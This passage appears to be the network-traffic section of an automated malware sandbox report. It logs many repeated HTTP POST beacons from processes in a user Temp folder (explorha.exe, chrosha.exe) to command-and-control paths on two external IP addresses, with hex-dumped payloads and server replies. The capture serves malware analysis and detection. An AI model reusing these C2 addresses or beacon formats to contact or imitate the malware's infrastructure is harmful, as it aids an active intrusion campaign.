                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.698558092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      496192.168.2.550340193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.605739117 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.858365059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      497192.168.2.550341193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.057404041 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.304892063 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      498192.168.2.550342193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.211976051 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.459619999 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      499192.168.2.550343193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.557760000 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.815040112 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      500192.168.2.550344193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.713951111 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:16.968626976 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      501192.168.2.550345193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.177166939 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.421614885 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      502192.168.2.550346193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.322401047 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.571221113 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      503192.168.2.550347193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.672910929 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.926021099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      504192.168.2.550348193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:17.819947958 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.068926096 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      505192.168.2.550349193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.291055918 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.539308071 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      506192.168.2.550350193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.432881117 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.682868004 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      507192.168.2.550351193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.791254044 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.043031931 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      508192.168.2.550352193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:18.935334921 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.183657885 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      509192.168.2.550353193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.403923988 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.655016899 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      510192.168.2.550354193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.542620897 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.791121006 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      511192.168.2.550355193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:19.907042027 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.157968044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


